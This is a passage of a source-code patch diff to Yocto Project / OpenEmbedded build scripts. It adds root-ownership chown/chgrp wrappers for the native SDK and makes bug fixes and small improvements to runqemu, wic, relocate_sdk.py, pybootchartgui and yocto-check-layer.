+ install_cmd = "install -m 0644 %s %s" % (part.updated_fstab_path, fstab_path)
+ if new_pseudo:
+ pseudo = cls.__get_pseudo(native_sysroot, new_rootfs, new_pseudo)
+ else:
+ pseudo = None
+ exec_native_cmd(install_cmd, native_sysroot, pseudo)
part.prepare_rootfs(cr_workdir, oe_builddir,
- new_rootfs or part.rootfs_dir, native_sysroot)
+ new_rootfs or part.rootfs_dir, native_sysroot,
+ pseudo_dir = new_pseudo or pseudo_dir)
diff --git a/scripts/nativesdk-intercept/chgrp b/scripts/nativesdk-intercept/chgrp
new file mode 100755
index 0000000000..30cc417d3a
--- /dev/null
+++ b/scripts/nativesdk-intercept/chgrp
@@ -0,0 +1,27 @@
+#!/usr/bin/env python3
+#
+# Wrapper around 'chgrp' that redirects to root in all cases
+
+import os
+import shutil
+import sys
+
+# calculate path to the real 'chgrp'
+path = os.environ['PATH']
+path = path.replace(os.path.dirname(sys.argv[0]), '')
+real_chgrp = shutil.which('chgrp', path=path)
+
+args = list()
+
+found = False
+for i in sys.argv:
+ if i.startswith("-"):
+ args.append(i)
+ continue
+ if not found:
+ args.append("root")
+ found = True
+ else:
+ args.append(i)
+
+os.execv(real_chgrp, args)
diff --git a/scripts/nativesdk-intercept/chown b/scripts/nativesdk-intercept/chown
new file mode 100755
index 0000000000..3914b3e384
--- /dev/null
+++ b/scripts/nativesdk-intercept/chown
@@ -0,0 +1,27 @@
+#!/usr/bin/env python3
+#
+# Wrapper around 'chown' that redirects to root in all cases
+
+import os
+import shutil
+import sys
+
+# calculate path to the real 'chown'
+path = os.environ['PATH']
+path = path.replace(os.path.dirname(sys.argv[0]), '')
+real_chown = shutil.which('chown', path=path)
+
+args = list()
+
+found = False
+for i in sys.argv:
+ if i.startswith("-"):
+ args.append(i)
+ continue
+ if not found:
+ args.append("root:root")
+ found = True
+ else:
+ args.append(i)
+
+os.execv(real_chown, args)
diff --git a/scripts/oe-depends-dot b/scripts/oe-depends-dot
index 5eb3e12769..1c2d51c6ec 100755
--- a/scripts/oe-depends-dot
+++ b/scripts/oe-depends-dot
@@ -15,7 +15,7 @@ class Dot(object):
def __init__(self):
parser = argparse.ArgumentParser(
description="Analyse recipe-depends.dot generated by bitbake -g",
- epilog="Use %(prog)s --help to get help")
+ formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument("dotfile",
help = "Specify the dotfile", nargs = 1, action='store', default='')
parser.add_argument("-k", "--key",
@@ -32,6 +32,21 @@ class Dot(object):
" For example, A->B, B->C, A->C, then A->C can be removed.",
action="store_true", default=False)
+ parser.epilog = """
+Examples:
+First generate the .dot file:
+ bitbake -g core-image-minimal
+
+To find out why a package is being built:
+ %(prog)s -k <package> -w ./task-depends.dot
+
+To find out what a package depends on:
+ %(prog)s -k <package> -d ./task-depends.dot
+
+Reduce the .dot file to packages only, no tasks:
+ %(prog)s -r ./task-depends.dot
+"""
+
self.args = parser.parse_args()
if len(sys.argv) != 3 and len(sys.argv) < 5:
@@ -99,6 +114,10 @@ class Dot(object):
if key == "meta-world-pkgdata":
continue
dep = m.group(2)
+ key = key.split('.')[0]
+ dep = dep.split('.')[0]
+ if key == dep:
+ continue
if key in depends:
if not key in depends[key]:
depends[key].add(dep)
diff --git a/scripts/oe-pkgdata-browser b/scripts/oe-pkgdata-browser
index 8d223185a4..65a6ee956e 100755
--- a/scripts/oe-pkgdata-browser
+++ b/scripts/oe-pkgdata-browser
@@ -236,6 +236,8 @@ class PkgUi():
update_deps("RPROVIDES", "Provides: ", self.provides_label, clickable=False)
def load_recipes(self):
+ if not os.path.exists(pkgdata):
+ sys.exit("Error: Please ensure %s exists by generating packages before using this tool." % pkgdata)
for recipe in sorted(os.listdir(pkgdata)):
if os.path.isfile(os.path.join(pkgdata, recipe)):
self.recipe_iters[recipe] = self.recipe_store.append([recipe])
diff --git a/scripts/oe-pkgdata-util b/scripts/oe-pkgdata-util
index 93220e3617..75dd23efa3 100755
--- a/scripts/oe-pkgdata-util
+++ b/scripts/oe-pkgdata-util
@@ -598,6 +598,9 @@ def main():
logger.error("Unable to find bitbake by searching parent directory of this script or PATH")
sys.exit(1)
logger.debug('Found bitbake path: %s' % bitbakepath)
+ if not os.environ.get('BUILDDIR', ''):
+ logger.error("This script can only be run after initialising the build environment (e.g. by using oe-init-build-env)")
+ sys.exit(1)
tinfoil = tinfoil_init()
try:
args.pkgdata_dir = tinfoil.config_data.getVar('PKGDATA_DIR')
diff --git a/scripts/oe-run-native b/scripts/oe-run-native
index 4e63e69cc4..22958d97e7 100755
--- a/scripts/oe-run-native
+++ b/scripts/oe-run-native
@@ -43,7 +43,7 @@ fi
OLD_PATH=$PATH
# look for a tool only in native sysroot
-PATH=$OECORE_NATIVE_SYSROOT/usr/bin:$OECORE_NATIVE_SYSROOT/bin:$OECORE_NATIVE_SYSROOT/usr/sbin:$OECORE_NATIVE_SYSROOT/sbin$(find $OECORE_NATIVE_SYSROOT/usr/bin/*-native -maxdepth 1 -type d -printf ":%p")
+PATH=$OECORE_NATIVE_SYSROOT/usr/bin:$OECORE_NATIVE_SYSROOT/bin:$OECORE_NATIVE_SYSROOT/usr/sbin:$OECORE_NATIVE_SYSROOT/sbin$(find $OECORE_NATIVE_SYSROOT/usr/bin -maxdepth 1 -name "*-native" -type d -printf ":%p")
tool_find=`/usr/bin/which $tool 2>/dev/null`
if [ -n "$tool_find" ] ; then
diff --git a/scripts/oe-setup-builddir b/scripts/oe-setup-builddir
index 30eaa8efbe..5a51fa793f 100755
--- a/scripts/oe-setup-builddir
+++ b/scripts/oe-setup-builddir
@@ -113,10 +113,10 @@ if [ ! -z "$SHOWYPDOC" ]; then
cat <<EOM
The Yocto Project has extensive documentation about OE including a reference
manual which can be found at:
- http://yoctoproject.org/documentation
+ https://docs.yoctoproject.org
For more information about OpenEmbedded see their website:
- http://www.openembedded.org/
+ https://www.openembedded.org/
EOM
# unset SHOWYPDOC
diff --git a/scripts/postinst-intercepts/update_font_cache b/scripts/postinst-intercepts/update_font_cache
index 46bdb8c572..900db042d6 100644
--- a/scripts/postinst-intercepts/update_font_cache
+++ b/scripts/postinst-intercepts/update_font_cache
@@ -5,6 +5,8 @@
set -e
+rm -f $D${fontconfigcachedir}/CACHEDIR.TAG
+
PSEUDO_UNLOAD=1 ${binprefix}qemuwrapper -L $D -E ${fontconfigcacheenv} $D${libexecdir}/${binprefix}fc-cache --sysroot=$D --system-only ${fontconfigcacheparams}
chown -R root:root $D${fontconfigcachedir}
diff --git a/scripts/pybootchartgui/pybootchartgui/draw.py b/scripts/pybootchartgui/pybootchartgui/draw.py
index 53324b9f8b..fc708b55c3 100644
--- a/scripts/pybootchartgui/pybootchartgui/draw.py
+++ b/scripts/pybootchartgui/pybootchartgui/draw.py
@@ -267,11 +267,14 @@ def draw_chart(ctx, color, fill, chart_bounds, data, proc_tree, data_range):
# avoid divide by zero
if max_y == 0:
max_y = 1.0
- xscale = float (chart_bounds[2]) / (max_x - x_shift)
+ if (max_x - x_shift):
+ xscale = float (chart_bounds[2]) / (max_x - x_shift)
+ else:
+ xscale = float (chart_bounds[2])
# If data_range is given, scale the chart so that the value range in
# data_range matches the chart bounds exactly.
# Otherwise, scale so that the actual data matches the chart bounds.
- if data_range:
+ if data_range and (data_range[1] - data_range[0]):
yscale = float(chart_bounds[3]) / (data_range[1] - data_range[0])
ybase = data_range[0]
else:
diff --git a/scripts/pybootchartgui/pybootchartgui/parsing.py b/scripts/pybootchartgui/pybootchartgui/parsing.py
index b42dac6b88..9d6787ec5a 100644
--- a/scripts/pybootchartgui/pybootchartgui/parsing.py
+++ b/scripts/pybootchartgui/pybootchartgui/parsing.py
@@ -128,7 +128,7 @@ class Trace:
def compile(self, writer):
def find_parent_id_for(pid):
- if pid is 0:
+ if pid == 0:
return 0
ppid = self.parent_map.get(pid)
if ppid:
diff --git a/scripts/relocate_sdk.py b/scripts/relocate_sdk.py
index 8c0fdb986a..8079d13750 100755
--- a/scripts/relocate_sdk.py
+++ b/scripts/relocate_sdk.py
@@ -97,11 +97,12 @@ def change_interpreter(elf_file_name):
if (len(new_dl_path) >= p_filesz):
print("ERROR: could not relocate %s, interp size = %i and %i is needed." \
% (elf_file_name, p_memsz, len(new_dl_path) + 1))
- break
+ return False
dl_path = new_dl_path + b("\0") * (p_filesz - len(new_dl_path))
f.seek(p_offset)
f.write(dl_path)
break
+ return True
def change_dl_sysdirs(elf_file_name):
if arch == 32:
@@ -215,6 +216,7 @@ else:
executables_list = sys.argv[3:]
+errors = False
for e in executables_list:
perms = os.stat(e)[stat.ST_MODE]
if os.access(e, os.W_OK|os.R_OK):
@@ -240,7 +242,8 @@ for e in executables_list:
arch = get_arch()
if arch:
parse_elf_header()
- change_interpreter(e)
+ if not change_interpreter(e):
+ errors = True
change_dl_sysdirs(e)
""" change permissions back """
@@ -253,3 +256,6 @@ for e in executables_list:
print("New file size for %s is different. Looks like a relocation error!", e)
sys.exit(-1)
+if errors:
+ print("Relocation of one or more executables failed.")
+ sys.exit(-1)
diff --git a/scripts/runqemu b/scripts/runqemu
index cc87ea871a..4dfc0e2d38 100755
--- a/scripts/runqemu
+++ b/scripts/runqemu
@@ -764,7 +764,7 @@ class BaseConfig(object):
raise RunQemuError('BIOS not found: %s' % bios_match_name)
if not os.path.exists(self.bios):
- raise RunQemuError("KERNEL %s not found" % self.bios)
+ raise RunQemuError("BIOS %s not found" % self.bios)
def check_mem(self):
@@ -974,17 +974,14 @@ class BaseConfig(object):
else:
self.nfs_server = '192.168.7.1'
- # Figure out a new nfs_instance to allow multiple qemus running.
- ps = subprocess.check_output(("ps", "auxww")).decode('utf-8')
- pattern = '/bin/unfsd .* -i .*\.pid -e .*/exports([0-9]+) '
- all_instances = re.findall(pattern, ps, re.M)
- if all_instances:
- all_instances.sort(key=int)
- self.nfs_instance = int(all_instances.pop()) + 1
-
- nfsd_port = 3049 + 2 * self.nfs_instance
- mountd_port = 3048 + 2 * self.nfs_instance
+ nfsd_port = 3048 + self.nfs_instance
+ lockdir = "/tmp/qemu-port-locks"
+ self.make_lock_dir(lockdir)
+ while not self.check_free_port('localhost', nfsd_port, lockdir):
+ self.nfs_instance += 1
+ nfsd_port += 1
+ mountd_port = nfsd_port
# Export vars for runqemu-export-rootfs
export_dict = {
'NFS_INSTANCE': self.nfs_instance,
@@ -1034,6 +1031,17 @@ class BaseConfig(object):
self.set('NETWORK_CMD', '-netdev bridge,br=%s,id=net0,helper=%s -device virtio-net-pci,netdev=net0 ' % (
self.net_bridge, os.path.join(self.bindir_native, 'qemu-oe-bridge-helper')))
+ def make_lock_dir(self, lockdir):
+ if not os.path.exists(lockdir):
+            # There might be a race issue when multiple runqemu processes are
+ # running at the same time.
+ try:
+ os.mkdir(lockdir)
+ os.chmod(lockdir, 0o777)
+ except FileExistsError:
+ pass
+ return
+
def setup_slirp(self):
"""Setup user networking"""
@@ -1052,14 +1060,7 @@ class BaseConfig(object):
mac = 2
lockdir = "/tmp/qemu-port-locks"
- if not os.path.exists(lockdir):
- # There might be a race issue when multi runqemu processess are
- # running at the same time.
- try:
- os.mkdir(lockdir)
- os.chmod(lockdir, 0o777)
- except FileExistsError:
- pass
+ self.make_lock_dir(lockdir)
# Find a free port to avoid conflicts
for p in ports[:]:
@@ -1099,14 +1100,7 @@ class BaseConfig(object):
logger.error("ip: %s" % ip)
raise OEPathError("runqemu-ifup, runqemu-ifdown or ip not found")
- if not os.path.exists(lockdir):
- # There might be a race issue when multi runqemu processess are
- # running at the same time.
- try:
- os.mkdir(lockdir)
- os.chmod(lockdir, 0o777)
- except FileExistsError:
- pass
+ self.make_lock_dir(lockdir)
cmd = (ip, 'link')
logger.debug('Running %s...' % str(cmd))
@@ -1328,6 +1322,8 @@ class BaseConfig(object):
for ovmf in self.ovmf_bios:
format = ovmf.rsplit('.', 1)[-1]
+ if format == "bin":
+ format = "raw"
self.qemu_opt += ' -drive if=pflash,format=%s,file=%s' % (format, ovmf)
self.qemu_opt += ' ' + self.qemu_opt_script
@@ -1421,13 +1417,13 @@ class BaseConfig(object):
logger.debug('Running %s' % str(cmd))
subprocess.check_call(cmd)
self.release_taplock()
- self.release_portlock()
if self.nfs_running:
logger.info("Shutting down the userspace NFS server...")
cmd = ("runqemu-export-rootfs", "stop", self.rootfs)
logger.debug('Running %s' % str(cmd))
subprocess.check_call(cmd)
+ self.release_portlock()
if self.saved_stty:
subprocess.check_call(("stty", self.saved_stty))
@@ -1514,7 +1510,8 @@ def main():
def sigterm_handler(signum, frame):
logger.info("SIGTERM received")
- os.kill(config.qemupid, signal.SIGTERM)
+ if config.qemupid:
+ os.kill(config.qemupid, signal.SIGTERM)
config.cleanup()
# Deliberately ignore the return code of 'tput smam'.
subprocess.call(["tput", "smam"])
diff --git a/scripts/verify-bashisms b/scripts/verify-bashisms
index fb0cc719ea..14d8c298e9 100755
--- a/scripts/verify-bashisms
+++ b/scripts/verify-bashisms
@@ -100,7 +100,7 @@ if __name__=='__main__':
args = parser.parse_args()
if shutil.which("checkbashisms.pl") is None:
- print("Cannot find checkbashisms.pl on $PATH, get it from https://anonscm.debian.org/cgit/collab-maint/devscripts.git/plain/scripts/checkbashisms.pl")
+ print("Cannot find checkbashisms.pl on $PATH, get it from https://salsa.debian.org/debian/devscripts/raw/master/scripts/checkbashisms.pl")
sys.exit(1)
# The order of defining the worker function,
diff --git a/scripts/wic b/scripts/wic
index 24700f380f..99a8a97ccb 100755
--- a/scripts/wic
+++ b/scripts/wic
@@ -22,9 +22,9 @@ import sys
import argparse
import logging
import subprocess
+import shutil
from collections import namedtuple
-from distutils import spawn
# External modules
scripts_path = os.path.dirname(os.path.realpath(__file__))
@@ -47,7 +47,7 @@ if os.environ.get('SDKTARGETSYSROOT'):
break
sdkroot = os.path.dirname(sdkroot)
-bitbake_exe = spawn.find_executable('bitbake')
+bitbake_exe = shutil.which('bitbake')
if bitbake_exe:
bitbake_path = scriptpath.add_bitbake_lib_path()
import bb
@@ -206,7 +206,7 @@ def wic_create_subcommand(options, usage_str):
logger.info(" (Please check that the build artifacts for the machine")
logger.info(" selected in local.conf actually exist and that they")
logger.info(" are the correct artifacts for the image (.wks file)).\n")
- raise WicError("The artifact that couldn't be found was %s:\n %s", not_found, not_found_dir)
+ raise WicError("The artifact that couldn't be found was %s:\n %s" % (not_found, not_found_dir))
krootfs_dir = options.rootfs_dir
if krootfs_dir is None:
@@ -312,6 +312,8 @@ def wic_init_parser_create(subparser):
subparser.add_argument("-o", "--outdir", dest="outdir", default='.',
help="name of directory to create image in")
+ subparser.add_argument("-w", "--workdir",
+ help="temporary workdir to use for intermediate files")
subparser.add_argument("-e", "--image-name", dest="image_name",
help="name of the image to use the artifacts from "
"e.g. core-image-sato")
diff --git a/scripts/yocto-check-layer b/scripts/yocto-check-layer
index b7c83c8b54..dd930cdddd 100755
--- a/scripts/yocto-check-layer
+++ b/scripts/yocto-check-layer
@@ -24,7 +24,7 @@ import scriptpath
scriptpath.add_oe_lib_path()
scriptpath.add_bitbake_lib_path()
-from checklayer import LayerType, detect_layers, add_layers, add_layer_dependencies, get_signatures, check_bblayers
+from checklayer import LayerType, detect_layers, add_layers, add_layer_dependencies, get_layer_dependencies, get_signatures, check_bblayers
from oeqa.utils.commands import get_bb_vars
PROGNAME = 'yocto-check-layer'
@@ -51,6 +51,8 @@ def main():
help='File to output log (optional)', action='store')
parser.add_argument('--dependency', nargs="+",
help='Layers to process for dependencies', action='store')
+ parser.add_argument('--no-auto-dependency', help='Disable automatic testing of dependencies',
+ action='store_true')
parser.add_argument('--machines', nargs="+",
help='List of MACHINEs to be used during testing', action='store')
parser.add_argument('--additional-layers', nargs="+",
@@ -121,6 +123,21 @@ def main():
if not layers:
return 1
+ # Find all dependencies, and get them checked too
+ if not args.no_auto_dependency:
+ depends = []
+ for layer in layers:
+ layer_depends = get_layer_dependencies(layer, dep_layers, logger)
+ if layer_depends:
+ for d in layer_depends:
+ if d not in depends:
+ depends.append(d)
+
+ for d in depends:
+ if d not in layers:
+ logger.info("Adding %s to the list of layers to test, as a dependency", d['name'])
+ layers.append(d)
+
shutil.copyfile(bblayersconf, bblayersconf + '.backup')
def cleanup_bblayers(signum, frame):
shutil.copyfile(bblayersconf + '.backup', bblayersconf)
@@ -138,6 +155,9 @@ def main():
layer['type'] == LayerType.ERROR_BSP_DISTRO:
continue
+ # Reset to a clean backup copy for each run
+ shutil.copyfile(bblayersconf + '.backup', bblayersconf)
+
if check_bblayers(bblayersconf, layer['path'], logger):
logger.info("%s already in %s. To capture initial signatures, layer under test should not present "
"in BBLAYERS. Please remove %s from BBLAYERS." % (layer['name'], bblayersconf, layer['name']))
@@ -149,17 +169,13 @@ def main():
logger.info("Setting up for %s(%s), %s" % (layer['name'], layer['type'],
layer['path']))
- shutil.copyfile(bblayersconf + '.backup', bblayersconf)
-
missing_dependencies = not add_layer_dependencies(bblayersconf, layer, dep_layers, logger)
if not missing_dependencies:
for additional_layer in additional_layers:
if not add_layer_dependencies(bblayersconf, additional_layer, dep_layers, logger):
missing_dependencies = True
break
- if not add_layer_dependencies(bblayersconf, layer, dep_layers, logger) or \
- any(map(lambda additional_layer: not add_layer_dependencies(bblayersconf, additional_layer, dep_layers, logger),
- additional_layers)):
+ if missing_dependencies:
logger.info('Skipping %s due to missing dependencies.' % layer['name'])
results[layer['name']] = None
results_status[layer['name']] = 'SKIPPED (Missing dependencies)'